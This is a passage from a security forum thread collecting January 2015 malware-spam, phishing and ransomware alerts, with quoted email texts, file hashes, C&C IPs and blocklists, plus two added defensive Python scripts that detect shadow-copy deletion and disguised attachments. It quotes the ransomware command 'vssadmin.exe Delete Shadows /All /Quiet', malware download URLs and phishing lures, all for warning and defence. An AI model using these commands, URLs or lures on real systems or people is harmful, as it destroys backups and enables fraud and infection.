Worth noting that both of those links were created December 10, and as you now have to log into Bit.ly to see additional stats – and I can’t currently login – we can’t comment on what percentage of those clicks are very recent. All the same, we shouldn’t look to keep clicking now and encourage -more- spam as a result. Twitter spam runs are one of those things which will never go away, and it pays to have an idea of the kind of antics* spammers get up to. If you’re looking for some advice on how to keep your Twitter account safe you may wish to look at the latter half of this post** while you’re at it..."
* https://blog.malwarebytes.org/?s=twitter+spam

** https://blog.malwarebytes.org/fraud-scam/2014/01/twitter-spam-rides-again-keeping-your-account-safe/

:fear: :mad: :fear:

AplusWebMaster
2015-01-12, 15:49
FYI...

Fake 'Summary Paid Against' SPAM - doc malware
- http://myonlinesecurity.co.uk/jason-bracegirdle-jps-projects-ltd-summary-paid-word-doc-malware/
12 Jan 2015 - "'Summary Paid Against' pretending to come from Jason Bracegirdle JPS Projects Ltd <jason.bracegirdle@ jpsprojectsltd .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains the same malware payload as today’s Invoice from 'simply carpets of Keynsham Ltd' - Word doc malware* although the file attachment has a different name...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Summary-Paid-Against.jpg

11 January 2015: Copy of Weekly Summary 28 12 2014 w.e 28.12.14.doc - Current Virus total detections: 3/54**
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/invoice-simply-carpets-keynsham-ltd-word-doc-malware/

** https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421063953/

- http://blog.dynamoo.com/2015/01/this-fake-finance-email-appears-to-be.html
12 Jan 2015
1] https://www.virustotal.com/en/file/07b3284bc17ea667c8239d402a70005150ab005508234f8f4c6e9b11698287c7/analysis/1421065786/

2] https://www.virustotal.com/en/file/10eca59c3d4df784bbb5fb581adf65dbb0c7ec4d95476816cb0f9ce4100b27e3/analysis/1421065795/

> http://blog.dynamoo.com/2015/01/malware-spam-invoice-from-simply.html
12 Jan 2015
Recommended blocklist:
59.148.196.153
74.208.11.204 "
___

Outlook Settings Spam
- http://threattrack.tumblr.com/post/107897760068/outlook-settings-spam
Jan 12, 2015 - "Subjects Seen:
Important - New Outlook Settings
Typical e-mail details:
Please carefully read the downloaded instructions before updating settings.
campusnut .com/outlook/settings.html
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@ Outlook-us.com and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

Malicious URLs:
Malicious File Name and MD5:
outlook_setting_pdf.exe (9F2018FC3C7DE300D1069460559659F4)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/16f8ee0bb94ce84727dff6d414dd3a33/tumblr_inline_ni2n28AfD81r6pupn.png

Tagged: Outlook, Upatre

- http://blog.dynamoo.com/2015/01/malware-spam-important-new-outlook.html
12 Jan 2015
... outlook_setting_pdf.exe
* https://www.virustotal.com/en/file/e4f76ca8fd1f708736bf5a47703099878e085e7b9b12ca98656428be1de284a5/analysis/1421077347/
"... Recommended blocklist:
202.153.35.133
morph-x .com
coffeeofthemonth .biz "

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

iPhone 6 SCAM
- https://blog.malwarebytes.org/fraud-scam/2015/01/iphone-6-scam-returns/
Jan 12, 2015 - "... a familiar -scam- on the verge of a come-back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/brad.png
... we first encountered the spammed link on LinkedIn, thanks to a user named Kolko Kolko, who according to his profile is a coach and has the face of an A-list celebrity. Doing a quick online search using the Goog.gl shortened URL brings up other domains—Google Plus, Livejournal, and Picasa, specifically — where the list is also being posted and shared. Once users click-the-link, they are directed to a survey -scam- page. Below is an example:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/survey.png
The above page is a type of survey that gives users the option to skip. Doing so, however, opens additional layers of survey pages that need skipping until such a point that users encounter a page they could not escape, such as this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/more-surveys.png
... the surveys vary depending on the user’s location... Should you encounter any posts from random users on sites you frequent with regard to claiming an iPhone 6, don’t click-the-link... warn friends and contacts on that site to avoid falling for it..."
___

Phish - Barclaycard Credit limit increase
- http://myonlinesecurity.co.uk/barclaycard-credit-limit-increase-phishing/
12 Jan 2015 - "'Credit limit increase' pretending to come from Barclaycard <barclaycard@ mail.barclaycard .co.uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. We are seeing a quite big run of this email today. We see these phishing emails frequently, but today’s spam run of them has a much larger number than usual. This one only wants your personal details, Barclaycard log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Credit-limit-increase-email.jpg

If you open the attached html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/barclaycard-Credit-limit-increase.jpg
When you fill in your user name and password you get a page where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. They then send you on to the genuine Barclaycard website..."
___

Google/Microsoft feud over latest 0-day disclosures
- http://www.infoworld.com/article/2867402/operating-systems/google-zero-day-disclosure-fuels-feud-with-microsoft.html
Jan 12, 2015 - "... The subject is the long-running feud between Google and Microsoft over the handling of zero-day flaws. Google engineer Tavis Ormandy has built quite a reputation in security circles for finding zero days in Windows and notifying Microsoft. If no action is forthcoming from Microsoft in a pre-determined amount of time (usually 90 days), Ormandy releases the details (presumably with Google's permission), typically on the Full Disclosure mailing list... The process is now formally supported by Google, under the name Project Zero*. There's no better way I know to get Microsoft's attention. The latest instances actually concern two zero-day bugs, both reported by a Google researcher known as Forshaw... Here's how the argument boils down, in my estimation. If you trust Microsoft to fix the holes in Windows, then Coordinated Vulnerability Disclosure - where we, as customers, trust Microsoft to dig in and fix problems as soon as they're discovered - is a great idea. We would trust Microsoft to fix the problems expeditiously, because other people may have discovered the problem already. We also trust Microsoft to put enough money into the patching effort to make the fixes appear quickly and accurately. If you don't trust Microsoft, then the question becomes how best to hold Microsoft's feet to the fire. Although some believe in full, immediate disclosure, I don't buy that. There has to be a better way. Google's approach seems to me a reasonable one - although it's arguable that the zero-day notification window should be extended to 120 days..."
* http://googleonlinesecurity.blogspot.fr/2014/07/announcing-project-zero.html

> http://blogs.technet.com/b/msrc/archive/2015/01/11/a-call-for-better-coordinated-vulnerability-disclosure.aspx
___

TorrentLocker -ransomware- hits ANZ Region
- http://blog.trendmicro.com/trendlabs-security-intelligence/torrentlocker-ransomware-hits-anz-region/
Jan 11, 2015 - "... the EMEA (Europe-Middle East-Africa) region experienced a surge in ransomware, specifically, crypto-ransomware attacks. It appears that these attacks are no longer limited to that region. Research from Trend Micro engineers shows that the ANZ (Australia-New Zealand) region is the latest to be greatly affected by this type of malware—this time by TorrentLocker ransomware. The Infection Chain:
Infection diagram for ANZ attacks:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/ANZ-cryp11.jpg
The malware arrives through -emails- that pretend to be penal notices from the New South Wales government (referred to in this entry as “NSW”) -or- shipping information from the Australia Post. Once users click-the-link, they will be -redirected- to a -spoofed- page bearing a newly-registered domain similar to the official, legitimate one. The page instructs users to download a file by first entering a CAPTCHA code. If correctly entered, it triggers the download of the malicious file in a zipped format from SendSpace, a file-hosting site. If the user -opens- the zipped file and executes the malware, it will connect to secure command-and-control (C&C) servers. After successful sending and receiving of information, the malware will then encrypt files in the users’ machines using Elliptic Curve Cryptography Encryption and append the string .encrypted. Afterwards, it drops an .HTML file with decryption instructions and displays a ransom page. It also deletes the shadow copy of the infected system by executing the command line instruction vssadmin.exe Delete Shadows /All /Quiet, thus preventing the user from restoring their files from back-up. Based on feedback from the Smart Protection Network, 98.28% of the recipients are from Australia... ... we have identified several fake domains, 180 for Australia Post and 134 for NSW. These domains are hosted on the following Russian name servers, registered to certain email addresses:
91.218.228.XX
193.124.200.13X
193.124.205.18X
193.124.89.10X
The C&C servers in these attacks are newly registered and hosted under IP addresses ranging from 46.161.30.17 to 46.161.30.49. We have also identified eight domains, including adwordshelper[.]ru and countryregion[.]ru... Sample hashes of the files supported by our detections:
..."
(More detail at the trendmicro URL at the top of this post.)

:fear: :mad:
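
The shadow-copy deletion step in the TorrentLocker chain above (vssadmin.exe Delete Shadows /All /Quiet) is the kind of action a process-creation log can catch; what follows is an added detection example, not code from the Trend Micro post. The pipe-separated log format, the constructed sample lines and the severity rule (parent binary in a user-writable path) are all assumptions.

```python
"""
Added example (not from the Trend Micro post): flag shadow-copy deletion via
vssadmin in process-creation events, as the ransomware described above does.
Log format (assumed): timestamp|host|parent_image|image|command_line
"""
import re
from typing import Dict, List

# Constructed sample events: a dropper run from %TEMP% that then calls
# vssadmin, a harmless 'list shadows', and a backup agent pruning old copies.
SAMPLE_LOG = r"""
2015-01-11T09:12:01Z|WS-017|C:\Windows\explorer.exe|C:\Users\alice\AppData\Local\Temp\zvhwq.exe|"C:\Users\alice\AppData\Local\Temp\zvhwq.exe"
2015-01-11T09:12:03Z|WS-017|C:\Users\alice\AppData\Local\Temp\zvhwq.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe Delete Shadows /All /Quiet
2015-01-11T09:15:44Z|WS-017|C:\Windows\System32\cmd.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe list shadows
2015-01-11T10:02:10Z|SRV-BK1|C:\Program Files\BackupAgent\agent.exe|C:\Windows\System32\vssadmin.exe|vssadmin.exe Delete Shadows /For=C: /Oldest
""".strip().splitlines()

# Any vssadmin invocation that deletes shadows, regardless of switch order.
SHADOW_DELETE_RE = re.compile(
    r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE)
# A parent living where an unprivileged user (or a dropper) can write.
USER_WRITABLE_RE = re.compile(r"\\(?:Users|Temp|AppData)\\", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Split one event; maxsplit keeps any '|' inside the command line."""
    ts, host, parent, image, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmd": cmd}


def detect_shadow_deletion(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per shadow-deleting event. Severity is 'high' when
    the parent process runs from a user-writable path, 'medium' otherwise
    (legitimate backup software also prunes shadow copies)."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        if not SHADOW_DELETE_RE.search(ev["cmd"]):
            continue
        severity = "high" if USER_WRITABLE_RE.search(ev["parent"]) else "medium"
        findings.append({**ev, "rule": "shadow-copy-deletion", "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect_shadow_deletion(SAMPLE_LOG):
        print(f["severity"], f["host"], f["parent"], "->", f["cmd"])
```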

AplusWebMaster
2015-01-13, 16:24
FYI...

Fake 'Nat West Secure Message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/nat-west-new-secure-message-fake-pdf-malware/
13 Jan 2013 - "'You have a new Secure Message' pretending to come from NatWest <secure.message@ natwest .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 2313.

13 January 2015: SecureMessage.pdf.zip: Extracts to: SecureMessage.pdf.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1b8ea8bbd91995f7a9e1c5f6aaf8fa098940c40f025d20d4b00e34bb8839e288/analysis/1421155786/
___

Fake 'Tax return' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-johnsmithmail-irsgov-your.html
13 Jan 2015 - "This -fake- tax return spam leads to malware:
From: John Smith [mailto:john.smith@ mail-irs .gov]
Sent: 13 January 2015 11:13
Subject: Your tax return was incorrectly filled out
Attention: Owner/ Manager
We would like to inform you that you have made mistakes while completing the last tax form application (ID: 960164707883) .
Please follow the advice of our tax specialists HERE
Please amend the mistakes and send the corrected tax return to your tax agent as soon as possible.
Yours sincerely

The link in the email has a format such as:
http ://marypageevans .com/taxadmin/get_doc.html
http ://laser-support .co.uk/taxadmin/get_doc.html
A journey through some heavily obfuscated javascript follows... which eventually leads to a download called message.zip which contains a malicious executable tax_guide_pdf.exe which changes slightly every time it is downloaded. Incidentally, there seems to be a download limit of about 6 times, after which nonsense text is displayed instead. The .exe file has a VirusTotal detection rate of just 2/57* and Norman identifies it as Upatre. According to the Malwr report it connects to the following URLs:
http ://202.153.35.133 :19639/1301us23/HOME/0/51-SP3/0/
http ://202.153.35.133 :19639/1301us23/HOME/1/0/0/
http ://dstkom .com/mandoc/lit23.pdf
http ://202.153.35.133 :19657/1301us23/HOME/41/7/4/
It also drops a file (in this case called FbIpg60.exe) which has another low detection rate of just 2/57**. Fake IRS spam is quite common, if you don't deal with the IRS then blocking mail-irs .gov on your email gateway might help."
* https://www.virustotal.com/en/file/bd3147d1a6a06a59dc2362229a642a4de11fb0d49525b4333208530716bfe139/analysis/1421160583/

** https://www.virustotal.com/en/file/9cb95959bec83625a6cd9e2dd7d2261bc5715efb28124e600d9db357ea3912dc/analysis/1421161232/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___

Win7 - End of mainstream support
- http://windowssecrets.com/top-story/win7-reaches-milestone-prepare-for-its-demise/
Jan 8, 2015 - "... Most major Microsoft products have a formal life cycle that includes two key end-of-life dates. For Windows, those dates are listed on Microsoft’s “Windows lifecycle fact sheet” webpage.* The first date — End of mainstream support — effectively means that Microsoft will no longer offer free updates to the operating system. Once mainstream support ends for a specific version of Windows, it then enters its Extended support phase, during which Microsoft offers only essential fixes and security updates. (Companies can also pay for specific nonsecurity updates.) When an OS reaches its End of extended support milestone, all official support ends. Windows XP, as many Windows Secrets readers know, passed its “End of extended support” date on April 8, 2014. It has not had official updates of any kind since. (For more specifics on MS product life cycles, see the online “Microsoft support lifecycle policy FAQ.”) As noted in the “Windows lifecycle fact sheet,” Jan. 13 marks the end of mainstream support for all versions of Windows 7 SP1. What does that mean for the millions of us doing our daily computing on Win7 systems? Very soon, our operating systems will be essentially frozen — we’ll no longer receive any enhancements or nonessential fixes. We will, however, receive monthly security updates until Jan. 14, 2020, Win7’s official “End of extended support” date (at which point, Microsoft will want us on Windows 13 — or whatever it’s then called). Just as with XP this past April, Win7 systems should no longer receive updates of any kind after January 2020..."
* http://windows.microsoft.com/en-us/windows/lifecycle

- http://www.theinquirer.net/inquirer/news/2390045/microsoft-ends-mainstream-support-for-windows-7
Jan 13 2015

:fear: :mad:

AplusWebMaster
2015-01-14, 13:59
FYI...

Fake 'Invoice' SPAM – doc malware
- http://myonlinesecurity.co.uk/les-mills-invoice-word-doc-malware/
14 Jan 2015 - "'Les Mills Invoice' pretending to come from lmuk.accounts@ lesmills .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... As usual 2 slightly different -malware- versions. The email looks like:
Dear Customer,
Please find attached an invoice for Les Mills goods/services. Please note that for Licence Fee invoices the month being billed is the month in which the invoice has been raised unless otherwise stated within.
If you have any queries please email lmuk.accounts@ lesmills .com or call 0207 264 0200 and select option 3 to speak to a member of the team.
Best regards,
Les Mills Finance Team

14 January 2015 : Les Mills SIV035931.doc - Current Virus total detections: 0/57* : 0/55**
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3dbc665b89a7a99de58614e905d4fa6105194e6d46d6d36f6756867bcd596564/analysis/

** https://www.virustotal.com/en/file/328929f0fbfa8c28e234741138e2e48a8ab5992d36e5eaaf62017abc57f47b11/analysis/1421225265/

- http://blog.dynamoo.com/2015/01/malware-spam-les-mills-invoice.html
14 Jan 2015
"... Recommended blocklist:
59.148.196.153
74.208.11.204
81.27.38.97
okurimono.ina-ka .com "
___

Fake 'SEPA' SPAM – doc malware
- http://myonlinesecurity.co.uk/senior-accounts-payable-sepa-remittance-advice-word-doc-malware/
14 Jan 2015 - "'Senior Accounts Payable SEPA REMITTANCE ADVICE 2503.62 EUR 12 JAN 2014' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good Afternoon
Please see attached a copy of remittance advice for SEPA payment of 2503.62 EUR made on 12/01/2015
Regards,
Victoria Mack
Senior Accounts Payable

14 January 2015 : SE827QR.doc - Current Virus total detections: 0/57*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/647d4115b9a7a77076ec268a480cf898d18433929664200e1b336ecfdc357fcd/analysis/1421236177/
___

Fake Fax SPAM - PDF malware
- http://myonlinesecurity.co.uk/nextiva-vfax-fake-pdf-malware/
14 Jan 2015 - "'Fax Received: Fax Server | 1/14/2015 8:21 AM' pretending to come from Nextiva vFax <notifications@ nextivafax .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HI ...
Delivery Information:
Message #: 131177970
Local Number: 4853872678
Remote CSID: Fax Server
Total Pages: 2
Transmit Time: 3 min 41.000 sec
Click here to view this message ...
Delivered by vFax… “When Every Fax is Mission Critical”

14 January 2015: fax_message_01142015_784398443.pdf.zip ( 83kb): Extracts to: fax_message_01142015_784398443.pdf.scr - Current Virus total detections: 3/55*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/dbc7a917aa4137ef6ef6b3d169b92e6100f44079ca07f79067469f871beffdd5/analysis/1421251998/
___

Malware sites offering Oracle 'patches'
- https://blogs.oracle.com/proactivesupportDI/entry/malware_sites_offering_oracle_patches
Jan 14, 2015 - "It has come to our attention that there are non-Oracle sites offering Oracle 'fixes' for genuine Oracle error messages... If you do encounter one of these sites please inform us immediately via Communities* or create a SR and we will rectify the situation... Proactive Support are already investigating some known sites..."
* https://community.oracle.com/
___

Outlook Phish
- https://blog.malwarebytes.org/fraud-scam/2015/01/avoid-this-outlook-phish/
Jan 14, 2015 - "... phish mail in circulation... for Outlook accounts. The email reads as follows:
Dear Microsoft User,
Please note we have temporary blocked your account from receiving e-mails, because we detected fraudulent and spam activities from your mail box to some blacklisted email address, So for your own safety verify your account.
If a verification respond is not gotten from you in the next 24 hours, we are sorry we will be forced to permanently disable and delete your account from Microsoft Account.
To verify your Microsoft account, Click Here
We regret Any inconvenience.
Thanks,
The Microsoft account team

Clicking the link in the email – sbmarticles(dot)com/Z-zone/SigrypAmt2nd(dot)htm*, which has already popped up on Phishtank – takes potential victims to a spot of data URI phishing**.
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/uriphish1-300x186.jpg
Don’t be tricked into filling in login details via these types of attack – any email asking you to login or enter personal information (especially when warning you about account suspensions, unusual activity or any other form of shenanigans) should be treated with a generous helping of caution."
* 192.190.80.53: https://www.virustotal.com/en/ip-address/192.190.80.53/information/

** http://www.csoonline.com/article/2154202/social-engineering/phishing-attack-using-data-uris-to-target-google-accounts.html

:fear::fear: :mad:
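The fax spam above relies on Windows hiding the real extension, so that fax_message_01142015_784398443.pdf.scr is shown as a "PDF". The same trick recurs in later posts in this thread (.pdf.scr, Payment.scr, doc963_pdf.exe). The following is an added example of a mail-gateway attachment triage check, not code from the original post or from myonlinesecurity.co.uk; the extension lists and the sample filenames below are my own constructed input, drawn from the names quoted in the thread.

```python
import os
import re

# Extensions Windows will run directly when double-clicked. Illustrative list, not exhaustive.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js",
                   ".jse", ".wsf", ".hta", ".msi", ".dll"}
# Document/media extensions the spam puts in front of the real one as a decoy.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png", ".wav"}
# Macro-capable Office types (the Dridex invoice docs in this thread are plain .doc).
MACRO_EXTS = {".doc", ".docm", ".xls", ".xlsm", ".dot", ".dotm", ".ppt", ".pptm"}
# Containers that need to be opened and their members triaged in turn.
ARCHIVE_EXTS = {".zip", ".rar", ".7z", ".gz", ".tar", ".cab"}


def split_extensions(name):
    """Return every dot-suffix of a filename, lowercased and whitespace-stripped.
    'a.pdf.scr' -> ['.pdf', '.scr'];  'Invoice.PDF   .EXE' -> ['.pdf', '.exe']
    (the padding spaces are a common trick to push the real extension off-screen)."""
    base = os.path.basename(name.strip())
    parts = base.split(".")
    return ["." + p.strip().lower() for p in parts[1:]] if len(parts) > 1 else []


def classify_attachment(name):
    """Describe what an attachment name really is, regardless of the icon it shows."""
    exts = split_extensions(name)
    real = exts[-1] if exts else ""
    verdict = {
        "name": name,
        "real_extension": real,
        "executable": real in EXECUTABLE_EXTS,
        "archive": real in ARCHIVE_EXTS,
        "macro_capable": real in MACRO_EXTS,
        "decoy_extension": None,
    }
    # Classic double extension: report.pdf.scr
    if len(exts) >= 2 and exts[-2] in DECOY_EXTS and verdict["executable"]:
        verdict["decoy_extension"] = exts[-2]
    # Variant seen in the HSBC sample: doc963_pdf.exe (decoy joined with '_' or '-')
    if verdict["decoy_extension"] is None and verdict["executable"]:
        stem = os.path.basename(name.strip()).rsplit(".", 1)[0].lower()
        m = re.search(r"[_-](pdf|doc|docx|xls|jpg|wav)$", stem)
        if m:
            verdict["decoy_extension"] = "." + m.group(1)
    return verdict


def triage(names):
    """Map each attachment name to a gateway action:
    'block'   - directly executable (with or without a decoy extension)
    'inspect' - archive or macro-capable document, needs a closer look
    'allow'   - nothing suspicious about the name itself"""
    actions = {}
    for n in names:
        v = classify_attachment(n)
        if v["executable"]:
            actions[n] = "block"
        elif v["archive"] or v["macro_capable"]:
            actions[n] = "inspect"
        else:
            actions[n] = "allow"
    return actions


if __name__ == "__main__":
    # Constructed sample set, using names quoted in this thread plus two edge cases.
    samples = ["fax_message_01142015_784398443.pdf.scr", "invoice_418270412.pdf.zip",
               "doc963_pdf.exe", "Les Mills SIV035931.doc", "VOICE44982109219.scr",
               "Invoice.PDF      .EXE", "order-slip.rar", "notes.txt"]
    for name, action in triage(samples).items():
        v = classify_attachment(name)
        print(f"{action:8} {name!r:45} real={v['real_extension']} decoy={v['decoy_extension']}")
```

The point of splitting on every dot rather than using os.path.splitext alone is that the decoy extension is exactly what the user sees when "hide extensions for known file types" is on; logging it alongside the real one gives the help desk the same view the victim had.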

AplusWebMaster
2015-01-15, 15:32
FYI...

Fake 'invoice' SPAM - malware attached
- http://blog.dynamoo.com/2015/01/malware-spam-hexis-uk-limited-invoice.html
15 Jan 2015 - "This -fake- invoice has a malicious attachment. It does not come from Hexis UK Ltd, it is a forgery. Hexis is not sending the spam, nor have their systems been compromised in any way.
From: Invoice from Hexis [Invoice@ hexis .co.uk]
Date: 15 January 2015 at 06:36
Subject: Invoice
Sent 15 JAN 15 08:30
HEXIS (UK) LIMITED
7 Europa Way
Britannia Park
Lichfield
Staffordshire
WS14 9TZ
Telephone 01543 411221
Fax 01543 411246

Attached is a malicious Word document S-INV-CREATIFX-465219.doc which actually comes in -two- different versions (perhaps more) with low detection rates [1] [2] containing two slightly different macros... which download a component from one of the following locations:
http ://dramakazuki.kesagiri .net/js/bin.exe
http ://cassiope .cz/js/bin.exe
This has a VirusTotal detection rate of 3/57*. That report shows the malware phoning home to 74.208.11.204:8080 (1&1 Internet, US) which is a familiar C&C server which you should definitely block traffic to. My sources also identify a couple of other IPs, giving a recommended blocklist of:
59.148.196.153
74.208.11.204
81.27.38.97
UPDATE: the Malwr report shows that it drops a DLL with a VirusTotal detection rate of just 1/57**."
[1] https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421314924/

[2] https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421314937/

* https://www.virustotal.com/en/file/87f639a395dc72d9fa2aa517ec2776ee3c9e9c2fa71ba50d832e0ff012373b22/analysis/1421315774/

** https://www.virustotal.com/en/file/105fe9735add6aec937c9e6f611d512511c050895fd863a216d25980c54fad45/analysis/1421318457/


- http://myonlinesecurity.co.uk/hexis-uk-limited-invoice-word-doc-malware/
15 Jan 2015
* https://www.virustotal.com/en/file/6d3694dbebbcdba2899603354f299fba7a7781c6bc092877354cd96e635b4a4b/analysis/1421309107/

** https://www.virustotal.com/en/file/7db49013954e8864a5ad8bb6189ee7ab3917efff426b4e07670a335c68280bdb/analysis/1421309412/
___

Fake 'Payment request' SPAM - malware attachments
- http://blog.dynamoo.com/2015/01/malware-spam-payment-request-of-417694.html
15 Jan 2015 - "This -spam- comes with a malicious Word document attached:
from: Alan Case
date: 15 January 2015 at 08:49
subject: Payment request of 4176.94 (14 JAN 2015)
Dear Sirs,
Sub: Remitance of GBP 4176.94
This is with reference to the above, we request you to kindly remit GBP 4176.94 in favor of our bank account.
For more information on our bank details please refer to the attached document.
Thanking you,
Alan Case Remittance Manager

Other names and job titles seen... The payment amount, name and job title change in each spam, as does the name of the attachment (although this follows the format ADV0000XX). There are three malicious Word documents that I have seen, each with a low detection rate at VirusTotal [1] [2] [3] which in turn contain a slightly different macro... which attempt to download another component from one of the following locations:
http ://95.163.121.71 :8080/mopsi/popsi.php
http ://95.163.121.72 :8080/mopsi/popsi.php
http ://136.243.237.204 :8080/mopsi/popsi.php
Note the two adjacent IPs of 95.163.121.71 and 95.163.121.72 which belong to Digital Networks CJSC in Russia (aka DINETHOSTING), an IP range of 95.163.64.0/18 that I would recommend you consider blocking. 136.243.237.204 is a Hetzner IP. The macro downloads a file g08.exe from these locations which is then saved as %TEMP%\UGvdfg.exe. This has a VirusTotal detection rate of 4/57*. That VT report also shows the malware attempting to POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known bad IP. The Malwr report is inconclusive, but this executable probably drops a Dridex DLL.
Recommended blocklist:
194.146.136.1
95.163.121.71
95.163.121.72
136.243.237.204
UPDATE: the following -are- Dridex C&C servers which you should also block:
80.237.255.196 "
[1] https://www.virustotal.com/en/file/58aa6018bb493f02a4981adc395bda36a62235286b804eac6c493b16a7e76881/analysis/1421313787/

[2] https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421313798/

[3] https://www.virustotal.com/en/file/d1fd0df8db5c3283426d945be8e6cb466c455a1b1a9a534b5f1d33b3c81c5f09/analysis/1421313810/

* https://www.virustotal.com/en/file/f4c36c6e702324f0edb9fd62d2d50bb08c6507ff53847f2816870414dff53eaf/analysis/1421313825/


- http://myonlinesecurity.co.uk/payment-request-14-jan-2015-word-doc-malware/
15 Jan 2015
15 January 2015 : ADV0291LO.doc - Current Virus total detections: 3/55*
15 January 2015 : 57959SI.xls (35 kb) - Current Virus total detections: 3/57**
| 3093720WF.xls (47 kb) - Current Virus total detections: 2/57***
* https://www.virustotal.com/en/file/27d465eb58e46936afa1fea9efd2af211d8b57db447088e69d791b6f302b322d/analysis/1421309631/

** https://www.virustotal.com/en/file/0d8ebd5567fc7c9fdb87dc36673bb5b4e4f193efacfdd6bfddc36dc5b2422325/analysis/1421316140/

*** https://www.virustotal.com/en/file/a537774596d7ac16ca41e6f468c76c807747279de12ccb28b489322aee0b92df/analysis/1421315881/
___

Fake 'open24 .ie important changes alert' SPAM – malware
- http://myonlinesecurity.co.uk/open24-ie-important-changes-servicesemail-alert-malware/
15 Jan 2015 - "'Some important changes to some services' (email alert) pretending to come from Open24 <inf01@ open24 .ie> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fwd: Software Upgrade
Dear
Open24 Customer,
We have now implemented a number of
changes to our Internet Banking service. This is to ensure the highest
level of security of information passing between you and our server.
To have access to this service, simply follow the button below and activate the service...
Kind regards
Open24
This email is personal & confidential and is intended for the recipient only...

15 January 2015: open24changes.zip (523 kb) : Extracts to: Payment.scr
Current Virus total detections: 17/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/190aaa3ee308ecab4609e7229ee654fb7ab34044d324d65658b2789a9858a768/analysis/1421332957/
___

